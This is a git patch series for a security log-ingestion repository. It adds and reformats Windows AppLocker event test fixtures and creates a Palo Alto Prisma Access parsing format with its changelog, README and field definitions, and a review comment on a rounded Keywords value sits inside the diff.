+ },
+ "process": {
+ "id": 2476,
+ "pid": 2476,
+ "thread": {
+ "id": 2720
+ }
+ },
+ "related": {
+ "hosts": [
+ "HOST.test.fr"
+ ],
+ "user": [
+ "SYSTEM"
+ ]
+ },
+ "user": {
+ "domain": "NT AUTHORITY",
+ "id": "S-1-2-34",
+ "name": "SYSTEM"
+ }
+ }
+}
\ No newline at end of file
diff --git a/Windows/windows/tests/process_8005.json b/Windows/windows/tests/process_8005.json
new file mode 100644
index 000000000..6b0b66287
--- /dev/null
+++ b/Windows/windows/tests/process_8005.json
@@ -0,0 +1,72 @@
+{
+ "input": {
+ "sekoiaio": {
+ "intake": {
+ "dialect": "Windows",
+ "dialect_uuid": "9281438c-f7c3-4001-9bcc-45fd108ba1be"
+ }
+ },
+ "message": "{\"EventTime\":\"2024-10-02 10:42:01\",\"Hostname\":\"FOOBAR\",\"Keywords\":4611686018427388000,\"EventType\":\"INFO\",\"SeverityValue\":2,\"Severity\":\"INFO\",\"EventID\":8005,\"SourceName\":\"Microsoft-Windows-AppLocker\",\"ProviderGuid\":\"{CBDA4DBF-8D5D-4F69-9578-BE14AA540D22}\",\"Version\":0,\"Task\":0,\"OpcodeValue\":0,\"RecordNumber\":16535331,\"ActivityID\":\"{FE138280-0FB7-0002-8AA0-31FEB70FDB01}\",\"ProcessID\":5532,\"ThreadID\":10772,\"Channel\":\"Microsoft-Windows-AppLocker/MSI and Script\",\"Domain\":\"DOM\",\"AccountName\":\"account\",\"UserID\":\"S-1-2-34\",\"AccountType\":\"User\",\"Message\":\"%OSDRIVE%\\\\USERS\\\\ACCOUNT\\\\APPDATA\\\\LOCAL\\\\TEMP\\\\file.test was allowed to run.\",\"Opcode\":\"Info\",\"EventReceivedTime\":\"2024-10-02 10:42:02\",\"SourceModuleName\":\"eventlog\",\"SourceModuleType\":\"im_msvistalog\"}"
+ },
+ "expected": {
+ "message": "{\"EventTime\":\"2024-10-02 10:42:01\",\"Hostname\":\"FOOBAR\",\"Keywords\":4611686018427388000,\"EventType\":\"INFO\",\"SeverityValue\":2,\"Severity\":\"INFO\",\"EventID\":8005,\"SourceName\":\"Microsoft-Windows-AppLocker\",\"ProviderGuid\":\"{CBDA4DBF-8D5D-4F69-9578-BE14AA540D22}\",\"Version\":0,\"Task\":0,\"OpcodeValue\":0,\"RecordNumber\":16535331,\"ActivityID\":\"{FE138280-0FB7-0002-8AA0-31FEB70FDB01}\",\"ProcessID\":5532,\"ThreadID\":10772,\"Channel\":\"Microsoft-Windows-AppLocker/MSI and Script\",\"Domain\":\"DOM\",\"AccountName\":\"account\",\"UserID\":\"S-1-2-34\",\"AccountType\":\"User\",\"Message\":\"%OSDRIVE%\\\\USERS\\\\ACCOUNT\\\\APPDATA\\\\LOCAL\\\\TEMP\\\\file.test was allowed to run.\",\"Opcode\":\"Info\",\"EventReceivedTime\":\"2024-10-02 10:42:02\",\"SourceModuleName\":\"eventlog\",\"SourceModuleType\":\"im_msvistalog\"}",
+ "event": {
+ "code": "8005",
+ "message": 
"%OSDRIVE%\\USERS\\ACCOUNT\\APPDATA\\LOCAL\\TEMP\\file.test was allowed to run.",
+ "provider": "Microsoft-Windows-AppLocker"
+ },
+ "action": {
+ "id": 8005,
+ "properties": {
+ "AccountName": "account",
+ "AccountType": "User",
+ "Domain": "DOM",
+ "EventType": "INFO",
+ "Keywords": "4611686018427388000",
+ "OpcodeValue": 0,
+ "ProviderGuid": "{CBDA4DBF-8D5D-4F69-9578-BE14AA540D22}",
+ "Severity": "INFO",
+ "SourceName": "Microsoft-Windows-AppLocker",
+ "Task": 0
+ },
+ "record_id": 16535331,
+ "type": "Microsoft-Windows-AppLocker/MSI and Script"
+ },
+ "file": {
+ "name": "file.test",
+ "path": "%OSDRIVE%\\USERS\\ACCOUNT\\APPDATA\\LOCAL\\TEMP\\file.test"
+ },
+ "host": {
+ "hostname": "FOOBAR",
+ "name": "FOOBAR"
+ },
+ "log": {
+ "hostname": "FOOBAR",
+ "level": "info"
+ },
+ "os": {
+ "family": "windows",
+ "platform": "windows"
+ },
+ "process": {
+ "id": 5532,
+ "pid": 5532,
+ "thread": {
+ "id": 10772
+ }
+ },
+ "related": {
+ "hosts": [
+ "FOOBAR"
+ ],
+ "user": [
+ "account"
+ ]
+ },
+ "user": {
+ "domain": "DOM",
+ "id": "S-1-2-34",
+ "name": "account"
+ }
+ }
+}
\ No newline at end of file
From 6ba21b9d44f79bd521d7c8842fb28ba183e64de6 Mon Sep 17 00:00:00 2001
From: LenaigKaliou
Date: Mon, 14 Oct 2024 17:46:48 +0200
Subject: [PATCH 152/317] Fix on linting
---
 Windows/windows/tests/process_8002.json | 4 ++--
 Windows/windows/tests/process_8005.json | 4 ++--
 2 files changed, 4 insertions(+), 4 deletions(-)
diff --git a/Windows/windows/tests/process_8002.json b/Windows/windows/tests/process_8002.json
index 2fa32d712..9d3781a25 100644
--- a/Windows/windows/tests/process_8002.json
+++ b/Windows/windows/tests/process_8002.json
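Review bot: The `Keywords` value in the raw message, `4611686018427388000`, ends in `000` the way a double-precision serializer renders 2^62 (exact value 4611686018427387904), which suggests this sample was captured through a tool that had already rounded the 64-bit keyword mask; the 8002 fixture, by contrast, carries the exact `-9223372036854775808`. The parser keeps the field as a string in `action.properties.Keywords`, which is the right representation for 64-bit values, but the expectation then pins the rounded number; re-capturing the sample from a source that preserves integers would keep the fixture faithful to what the agent emits. That the rounding happened upstream is my inference, not visible in the hunk.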
@@ -1,12 +1,12 @@
 {
 "input": {
+ "message": "{\"EventTime\":\"2024-10-02 10:42:24\",\"Hostname\":\"HOST.test.fr\",\"Keywords\":-9223372036854775808,\"EventType\":\"INFO\",\"SeverityValue\":2,\"Severity\":\"INFO\",\"EventID\":8002,\"SourceName\":\"Microsoft-Windows-AppLocker\",\"ProviderGuid\":\"{CBDA4DBF-8D5D-4F69-9578-BE14AA540D22}\",\"Version\":0,\"Task\":0,\"OpcodeValue\":0,\"RecordNumber\":1812526,\"ProcessID\":2476,\"ThreadID\":2720,\"Channel\":\"Microsoft-Windows-AppLocker/EXE and DLL\",\"Domain\":\"NT AUTHORITY\",\"AccountName\":\"SYSTEM\",\"UserID\":\"S-1-2-34\",\"AccountType\":\"User\",\"Message\":\"%SYSTEM32%\\\\TEST\\\\APP.EXE was allowed to run.\",\"Opcode\":\"Info\",\"EventReceivedTime\":\"2024-10-02 10:42:25\",\"SourceModuleName\":\"eventlog\",\"SourceModuleType\":\"im_msvistalog\"}",
 "sekoiaio": {
 "intake": {
 "dialect": "Windows",
 "dialect_uuid": "9281438c-f7c3-4001-9bcc-45fd108ba1be"
 }
- },
- "message": "{\"EventTime\":\"2024-10-02 10:42:24\",\"Hostname\":\"HOST.test.fr\",\"Keywords\":-9223372036854775808,\"EventType\":\"INFO\",\"SeverityValue\":2,\"Severity\":\"INFO\",\"EventID\":8002,\"SourceName\":\"Microsoft-Windows-AppLocker\",\"ProviderGuid\":\"{CBDA4DBF-8D5D-4F69-9578-BE14AA540D22}\",\"Version\":0,\"Task\":0,\"OpcodeValue\":0,\"RecordNumber\":1812526,\"ProcessID\":2476,\"ThreadID\":2720,\"Channel\":\"Microsoft-Windows-AppLocker/EXE and DLL\",\"Domain\":\"NT AUTHORITY\",\"AccountName\":\"SYSTEM\",\"UserID\":\"S-1-2-34\",\"AccountType\":\"User\",\"Message\":\"%SYSTEM32%\\\\TEST\\\\APP.EXE was allowed to run.\",\"Opcode\":\"Info\",\"EventReceivedTime\":\"2024-10-02 10:42:25\",\"SourceModuleName\":\"eventlog\",\"SourceModuleType\":\"im_msvistalog\"}"
+ }
 },
 "expected": {
 "message": "{\"EventTime\":\"2024-10-02 
10:42:24\",\"Hostname\":\"HOST.test.fr\",\"Keywords\":-9223372036854775808,\"EventType\":\"INFO\",\"SeverityValue\":2,\"Severity\":\"INFO\",\"EventID\":8002,\"SourceName\":\"Microsoft-Windows-AppLocker\",\"ProviderGuid\":\"{CBDA4DBF-8D5D-4F69-9578-BE14AA540D22}\",\"Version\":0,\"Task\":0,\"OpcodeValue\":0,\"RecordNumber\":1812526,\"ProcessID\":2476,\"ThreadID\":2720,\"Channel\":\"Microsoft-Windows-AppLocker/EXE and DLL\",\"Domain\":\"NT AUTHORITY\",\"AccountName\":\"SYSTEM\",\"UserID\":\"S-1-2-34\",\"AccountType\":\"User\",\"Message\":\"%SYSTEM32%\\\\TEST\\\\APP.EXE was allowed to run.\",\"Opcode\":\"Info\",\"EventReceivedTime\":\"2024-10-02 10:42:25\",\"SourceModuleName\":\"eventlog\",\"SourceModuleType\":\"im_msvistalog\"}",
diff --git a/Windows/windows/tests/process_8005.json b/Windows/windows/tests/process_8005.json
index 6b0b66287..9a38f9033 100644
--- a/Windows/windows/tests/process_8005.json
+++ b/Windows/windows/tests/process_8005.json
@@ -1,12 +1,12 @@
 {
 "input": {
+ "message": "{\"EventTime\":\"2024-10-02 10:42:01\",\"Hostname\":\"FOOBAR\",\"Keywords\":4611686018427388000,\"EventType\":\"INFO\",\"SeverityValue\":2,\"Severity\":\"INFO\",\"EventID\":8005,\"SourceName\":\"Microsoft-Windows-AppLocker\",\"ProviderGuid\":\"{CBDA4DBF-8D5D-4F69-9578-BE14AA540D22}\",\"Version\":0,\"Task\":0,\"OpcodeValue\":0,\"RecordNumber\":16535331,\"ActivityID\":\"{FE138280-0FB7-0002-8AA0-31FEB70FDB01}\",\"ProcessID\":5532,\"ThreadID\":10772,\"Channel\":\"Microsoft-Windows-AppLocker/MSI and Script\",\"Domain\":\"DOM\",\"AccountName\":\"account\",\"UserID\":\"S-1-2-34\",\"AccountType\":\"User\",\"Message\":\"%OSDRIVE%\\\\USERS\\\\ACCOUNT\\\\APPDATA\\\\LOCAL\\\\TEMP\\\\file.test was allowed to run.\",\"Opcode\":\"Info\",\"EventReceivedTime\":\"2024-10-02 10:42:02\",\"SourceModuleName\":\"eventlog\",\"SourceModuleType\":\"im_msvistalog\"}",
 "sekoiaio": {
 "intake": {
 "dialect": "Windows",
 "dialect_uuid": "9281438c-f7c3-4001-9bcc-45fd108ba1be"
 }
- },
- "message": "{\"EventTime\":\"2024-10-02 10:42:01\",\"Hostname\":\"FOOBAR\",\"Keywords\":4611686018427388000,\"EventType\":\"INFO\",\"SeverityValue\":2,\"Severity\":\"INFO\",\"EventID\":8005,\"SourceName\":\"Microsoft-Windows-AppLocker\",\"ProviderGuid\":\"{CBDA4DBF-8D5D-4F69-9578-BE14AA540D22}\",\"Version\":0,\"Task\":0,\"OpcodeValue\":0,\"RecordNumber\":16535331,\"ActivityID\":\"{FE138280-0FB7-0002-8AA0-31FEB70FDB01}\",\"ProcessID\":5532,\"ThreadID\":10772,\"Channel\":\"Microsoft-Windows-AppLocker/MSI and Script\",\"Domain\":\"DOM\",\"AccountName\":\"account\",\"UserID\":\"S-1-2-34\",\"AccountType\":\"User\",\"Message\":\"%OSDRIVE%\\\\USERS\\\\ACCOUNT\\\\APPDATA\\\\LOCAL\\\\TEMP\\\\file.test was allowed to run.\",\"Opcode\":\"Info\",\"EventReceivedTime\":\"2024-10-02 10:42:02\",\"SourceModuleName\":\"eventlog\",\"SourceModuleType\":\"im_msvistalog\"}"
+ }
 },
 "expected": {
 "message": "{\"EventTime\":\"2024-10-02 
10:42:01\",\"Hostname\":\"FOOBAR\",\"Keywords\":4611686018427388000,\"EventType\":\"INFO\",\"SeverityValue\":2,\"Severity\":\"INFO\",\"EventID\":8005,\"SourceName\":\"Microsoft-Windows-AppLocker\",\"ProviderGuid\":\"{CBDA4DBF-8D5D-4F69-9578-BE14AA540D22}\",\"Version\":0,\"Task\":0,\"OpcodeValue\":0,\"RecordNumber\":16535331,\"ActivityID\":\"{FE138280-0FB7-0002-8AA0-31FEB70FDB01}\",\"ProcessID\":5532,\"ThreadID\":10772,\"Channel\":\"Microsoft-Windows-AppLocker/MSI and Script\",\"Domain\":\"DOM\",\"AccountName\":\"account\",\"UserID\":\"S-1-2-34\",\"AccountType\":\"User\",\"Message\":\"%OSDRIVE%\\\\USERS\\\\ACCOUNT\\\\APPDATA\\\\LOCAL\\\\TEMP\\\\file.test was allowed to run.\",\"Opcode\":\"Info\",\"EventReceivedTime\":\"2024-10-02 10:42:02\",\"SourceModuleName\":\"eventlog\",\"SourceModuleType\":\"im_msvistalog\"}",
From cf2fbfe87de71abe17b20efe6037b03d934c3700 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc
Date: Tue, 8 Oct 2024 12:38:25 +0200
Subject: [PATCH 153/317] feat(PaloAlto): add Palo Alto Prisma Access format
---
 .../paloalto-prima-access/CHANGELOG.md | 14 +
 .../paloalto-prima-access/README.md | 5 +
 .../paloalto-prima-access/_meta/fields.yml | 309 ++++++
 .../paloalto-prima-access/_meta/logo.png | Bin 0 -> 13410 bytes
 .../paloalto-prima-access/_meta/manifest.yml | 12 +
 .../_meta/smart-descriptions.json | 721 ++++++++++++++
 .../paloalto-prima-access/ingest/parser.yml | 880 ++++++++++++++++++
 .../tests/User_id_1_csv.json | 59 ++
 .../tests/User_id_2_csv.json | 59 ++
 .../paloalto-prima-access/tests/auth_cef.json | 76 ++
 .../tests/decryption_cef.json | 97 ++
 .../paloalto-prima-access/tests/file_cef.json | 97 ++
 .../tests/fix_bug_with_int.json | 93 ++
 .../tests/fix_bug_without_int.json | 91 ++
 .../tests/globalprotect_cef.json | 73 ++
 .../tests/globalprotect_csv.json | 72 ++
 .../tests/globalprotect_csv_2.json | 74 ++
 .../tests/hip_match_cef.json | 72 ++
 .../tests/icmp_allow_csv.json | 77 ++
 .../tests/iptag_cef.json | 59 ++
 .../tests/network_threat_alert_1.json | 106 +++
 .../tests/network_threat_alert_2.json | 128 +++
 .../paloalto-prima-access/tests/sctp_cef.json | 91 ++
 .../tests/system_csv.json | 56 ++
 .../tests/tcp_allow_csv.json | 77 ++
 .../tests/test_cloud_election_json.json | 55 ++
 .../tests/test_dhcp_renew_json.json | 56 ++
 .../tests/test_dns_proxy_json.json | 39 +
 .../tests/test_dns_response.json | 67 ++
 .../tests/test_file_alert_json.json | 105 +++
 .../tests/test_globalprotect.json | 77 ++
 .../tests/test_installed_package_json.json | 43 +
 .../tests/test_ldap_brute_force.json | 89 ++
 .../tests/test_new_file_type.json | 106 +++
 .../tests/test_new_globalprotect.json | 73 ++
 .../tests/test_new_threat_type.json | 93 ++
 .../tests/test_new_url_type.json | 111 +++
 .../tests/test_ntp_sync_json.json | 42 +
 .../tests/test_port_up_json.json | 46 +
 .../tests/test_registration_succeed_json.json | 51 +
 .../tests/test_system.json | 41 +
 .../tests/test_system_event_10_json.json | 49 +
 .../tests/test_system_event_11_json.json | 40 +
 .../tests/test_system_event_12_json.json | 56 ++
 .../tests/test_system_event_1_json.json | 43 +
 .../tests/test_system_event_2_json.json | 40 +
 .../tests/test_system_event_3_json.json | 48 +
 .../tests/test_system_event_4_json.json | 40 +
 .../tests/test_system_event_5_json.json | 40 +
 .../tests/test_system_event_6_json.json | 40 +
 .../tests/test_system_event_7_json.json | 51 +
 .../tests/test_system_event_8_json.json | 43 +
 .../tests/test_system_event_9_json.json | 40 +
 .../tests/test_threat.json | 94 ++
 .../tests/test_threat_02.json | 91 ++
 .../tests/test_timestamp_palo.json | 41 +
 .../tests/test_traffic_event_1_json.json | 87 ++
 .../tests/test_traffic_event_2_json.json | 87 ++
 .../tests/test_update_content_json.json | 47 +
 .../tests/test_upgrade_package_json.json | 47 +
 .../tests/test_user_authentication_json.json | 54 ++
 .../tests/test_userid.json | 60 ++
 .../tests/test_web_authentication_json.json | 57 ++
 .../tests/test_wildfire_failure_json.json | 52 ++
 .../tests/threat-url-xff.json | 109 +++
 .../tests/threat_cef.json | 128 +++
 .../tests/threat_csv.json | 85 ++
 .../tests/traffic1_csv.json | 108 +++
 .../tests/traffic2_csv.json | 112 +++
 .../tests/traffic_cef.json | 142 +++
 .../tests/traffic_with_resotimestamp.json | 78 ++
 .../tests/udp_deny_csv.json | 78 ++
 .../paloalto-prima-access/tests/url_cef.json | 135 +++
 .../tests/userid_cef.json | 77 ++
 .../tests/wildfire1_json.json | 111 +++
 75 files changed, 6902 insertions(+)
 create mode 100644 Palo Alto Networks/paloalto-prima-access/CHANGELOG.md
 create mode 100644 Palo Alto Networks/paloalto-prima-access/README.md
 create mode 100644 Palo Alto Networks/paloalto-prima-access/_meta/fields.yml
 create mode 100644 Palo Alto Networks/paloalto-prima-access/_meta/logo.png
 create mode 100644 Palo Alto Networks/paloalto-prima-access/_meta/manifest.yml
 create mode 100644 Palo Alto 
Networks/paloalto-prima-access/_meta/smart-descriptions.json create mode 100644 Palo Alto Networks/paloalto-prima-access/ingest/parser.yml create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/User_id_1_csv.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/User_id_2_csv.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/auth_cef.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/decryption_cef.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/file_cef.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/fix_bug_with_int.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/fix_bug_without_int.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/globalprotect_cef.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/globalprotect_csv.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/globalprotect_csv_2.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/hip_match_cef.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/icmp_allow_csv.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/iptag_cef.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/network_threat_alert_1.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/network_threat_alert_2.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/sctp_cef.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/system_csv.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/tcp_allow_csv.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_cloud_election_json.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_dhcp_renew_json.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_dns_proxy_json.json create mode 100644 Palo Alto 
Networks/paloalto-prima-access/tests/test_dns_response.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_file_alert_json.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_globalprotect.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_installed_package_json.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_ldap_brute_force.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_new_file_type.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_new_globalprotect.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_new_threat_type.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_new_url_type.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_ntp_sync_json.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_port_up_json.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_registration_succeed_json.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_system.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_system_event_10_json.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_system_event_11_json.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_system_event_12_json.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_system_event_1_json.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_system_event_2_json.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_system_event_3_json.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_system_event_4_json.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_system_event_5_json.json create mode 100644 Palo Alto 
Networks/paloalto-prima-access/tests/test_system_event_6_json.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_system_event_7_json.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_system_event_8_json.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_system_event_9_json.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_threat.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_threat_02.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_timestamp_palo.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_traffic_event_1_json.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_traffic_event_2_json.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_update_content_json.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_upgrade_package_json.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_user_authentication_json.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_userid.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_web_authentication_json.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/test_wildfire_failure_json.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/threat-url-xff.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/threat_cef.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/threat_csv.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/traffic1_csv.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/traffic2_csv.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/traffic_cef.json create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/traffic_with_resotimestamp.json create mode 
100644 Palo Alto Networks/paloalto-prima-access/tests/udp_deny_csv.json
create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/url_cef.json
create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/userid_cef.json
create mode 100644 Palo Alto Networks/paloalto-prima-access/tests/wildfire1_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/CHANGELOG.md b/Palo Alto Networks/paloalto-prima-access/CHANGELOG.md
new file mode 100644
index 000000000..97e0142f2
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/CHANGELOG.md
@@ -0,0 +1,14 @@
+# Changelog
+
+All notable changes to this project will be documented in this file.
+
+The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),
+and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
+
+## [Unreleased]
+
+## 2024-10-08
+
+### Added
+
+- Creation of the format
diff --git a/Palo Alto Networks/paloalto-prima-access/README.md b/Palo Alto Networks/paloalto-prima-access/README.md
new file mode 100644
index 000000000..40e67c767
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/README.md
@@ -0,0 +1,5 @@
+# Palo Alto Networks
+
+## Description
+
+Field and log example https://docs.paloaltonetworks.com/cortex/cortex-data-lake/log-forwarding-schema-reference/network-logs
diff --git a/Palo Alto Networks/paloalto-prima-access/_meta/fields.yml b/Palo Alto Networks/paloalto-prima-access/_meta/fields.yml
new file mode 100644
index 000000000..7c526334c
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/_meta/fields.yml
@@ -0,0 +1,309 @@ +email.from.address: + description: Email address from + name: email.from.address + type: keyword + +email.subject: + description: Subject + name: email.subject + type: keyword + +email.to.address: + description: Email address to + name: email.to.address + type: keyword + +paloalto: + description: Root of paloalto custom fields + name: paloalto + type: dict + +paloalto.ContentType: + description: Paloalto content type + name: paloalto.ContentType + type: keyword + +paloalto.DGHierarchyLevel1: + description: "A sequence of identification numbers that indicate the device group\u2019\ + s location within a device group hierarchy" + name: paloalto.DGHierarchyLevel1 + type: keyword + +paloalto.DGHierarchyLevel2: + description: "A sequence of identification numbers that indicate the device group\u2019\ + s location within a device group hierarchy" + name: paloalto.DGHierarchyLevel2 + type: keyword + +paloalto.DGHierarchyLevel3: + description: "A sequence of identification numbers that indicate the device group\u2019\ + s location within a device group hierarchy" + name: paloalto.DGHierarchyLevel3 + type: keyword + +paloalto.DGHierarchyLevel4: + description: "A sequence of identification numbers that indicate the device group\u2019\ + s location within a device group hierarchy" + name: paloalto.DGHierarchyLevel4 + type: keyword + +paloalto.DirectionOfAttack: + description: Attack direction + name: paloalto.DirectionOfAttack + type: keyword + +paloalto.EventID: + description: Type of the event + name: paloalto.EventID + type: keyword + +paloalto.PanOSContainerName: + description: '' + name: paloalto.PanOSContainerName + type: keyword + +paloalto.PanOSContainerNameSpace: + description: '' + name: paloalto.PanOSContainerNameSpace + type: keyword + +paloalto.PanOSDestinationDeviceCategory: + description: '' + name: paloalto.PanOSDestinationDeviceCategory + type: keyword + +paloalto.PanOSDestinationDeviceHost: + description: '' + name: 
paloalto.PanOSDestinationDeviceHost + type: keyword + +paloalto.PanOSDestinationDeviceMac: + description: '' + name: paloalto.PanOSDestinationDeviceMac + type: keyword + +paloalto.PanOSDestinationDeviceModel: + description: '' + name: paloalto.PanOSDestinationDeviceModel + type: keyword + +paloalto.PanOSDestinationDeviceOSFamily: + description: '' + name: paloalto.PanOSDestinationDeviceOSFamily + type: keyword + +paloalto.PanOSDestinationDeviceOSVersion: + description: '' + name: paloalto.PanOSDestinationDeviceOSVersion + type: keyword + +paloalto.PanOSDestinationDeviceProfile: + description: '' + name: paloalto.PanOSDestinationDeviceProfile + type: keyword + +paloalto.PanOSDestinationDeviceVendor: + description: '' + name: paloalto.PanOSDestinationDeviceVendor + type: keyword + +paloalto.PanOSDestinationEDL: + description: '' + name: paloalto.PanOSDestinationEDL + type: keyword + +paloalto.PanOSDestinationUUID: + description: '' + name: paloalto.PanOSDestinationUUID + type: keyword + +paloalto.PanOSEndpointSerialNumber: + description: PanOS Endpoint Serial Number + name: paloalto.PanOSEndpointSerialNumber + type: keyword + +paloalto.PanOSGPHostID: + description: '' + name: paloalto.PanOSGPHostID + type: keyword + +paloalto.PanOSHASessionOwner: + description: '' + name: paloalto.PanOSHASessionOwner + type: keyword + +paloalto.PanOSQuarantineReason: + description: Quarantine reason + name: paloalto.PanOSQuarantineReason + type: keyword + +paloalto.PanOSSDWANCluster: + description: '' + name: paloalto.PanOSSDWANCluster + type: keyword + +paloalto.PanOSSDWANClusterType: + description: '' + name: paloalto.PanOSSDWANClusterType + type: keyword + +paloalto.PanOSSDWANDeviceType: + description: '' + name: paloalto.PanOSSDWANDeviceType + type: keyword + +paloalto.PanOSSDWANPolicyName: + description: '' + name: paloalto.PanOSSDWANPolicyName + type: keyword + +paloalto.PanOSSDWANSite: + description: '' + name: paloalto.PanOSSDWANSite + type: keyword + 
+paloalto.PanOSSessionStartTime: + description: '' + name: paloalto.PanOSSessionStartTime + type: keyword + +paloalto.PanOSSourceDeviceHost: + description: '' + name: paloalto.PanOSSourceDeviceHost + type: keyword + +paloalto.PanOSSourceDeviceModel: + description: '' + name: paloalto.PanOSSourceDeviceModel + type: keyword + +paloalto.PanOSSourceDeviceProfile: + description: '' + name: paloalto.PanOSSourceDeviceProfile + type: keyword + +paloalto.PanOSSourceDeviceVendor: + description: '' + name: paloalto.PanOSSourceDeviceVendor + type: keyword + +paloalto.PanOSSourceDynamicAddressGroup: + description: '' + name: paloalto.PanOSSourceDynamicAddressGroup + type: keyword + +paloalto.PanOSSourceEDL: + description: '' + name: paloalto.PanOSSourceEDL + type: keyword + +paloalto.PanOSSourceLocation: + description: '' + name: paloalto.PanOSSourceLocation + type: keyword + +paloalto.PanOSSourceUUID: + description: '' + name: paloalto.PanOSSourceUUID + type: keyword + +paloalto.PanOSThreatCategory: + description: PanOS associated threat category + name: paloalto.PanOSThreatCategory + type: keyword + +paloalto.PanOSThreatID: + description: PanOS associated threat ID (e.g. 
Microsoft Windows NTLMSSP Detection(92322)) + name: paloalto.PanOSThreatID + type: keyword + +paloalto.PanOSVirtualSystemName: + description: '' + name: paloalto.PanOSVirtualSystemName + type: keyword + +paloalto.PanOSX-Forwarded-ForIP: + description: '' + name: paloalto.PanOSX-Forwarded-ForIP + type: keyword + +paloalto.Threat_ContentType: + description: Type associated with the threat + name: paloalto.Threat_ContentType + type: keyword + +paloalto.URLCategory: + description: '' + name: paloalto.URLCategory + type: keyword + +paloalto.VirtualLocation: + description: String representation of the unique identifier for a virtual system + on a Palo Alto Networks firewall + name: paloalto.VirtualLocation + type: keyword + +paloalto.VirtualSystemID: + description: A unique identifier for a virtual system on a Palo Alto Networks firewall + name: paloalto.VirtualSystemID + type: keyword + +paloalto.VirtualSystemName: + description: The name of the virtual system associated with the network traffic + name: paloalto.VirtualSystemName + type: keyword + +paloalto.authentication.method: + description: The authentication method for the GlobalProtect connection + name: paloalto.authentication.method + type: keyword + +paloalto.connection.method: + description: Identifies how the GlobalProtect app connected to the the Gateway + name: paloalto.connection.method + type: keyword + +paloalto.connection.stage: + description: The stage of the GlobalProtect connection + name: paloalto.connection.stage + type: keyword + +paloalto.dns.category: + description: Classify DNS requests in terms of security or relevance + name: paloalto.dns.category + type: keyword + +paloalto.endpoint.serial_number: + description: Unique device identifier + name: paloalto.endpoint.serial_number + type: keyword + +paloalto.source.private.ip: + description: Private IP address + name: paloalto.source.private.ip + type: keyword + +paloalto.source.region: + description: IP address range + name: 
paloalto.source.region + type: keyword + +paloalto.threat.category: + description: Threat Category + name: paloalto.threat.category + type: keyword + +paloalto.threat.id: + description: The identifier of the threat + name: paloalto.threat.id + type: keyword + +paloalto.threat.name: + description: The name of the threat + name: paloalto.threat.name + type: keyword + +paloalto.threat.type: + description: The type of the threat + name: paloalto.threat.type + type: keyword 
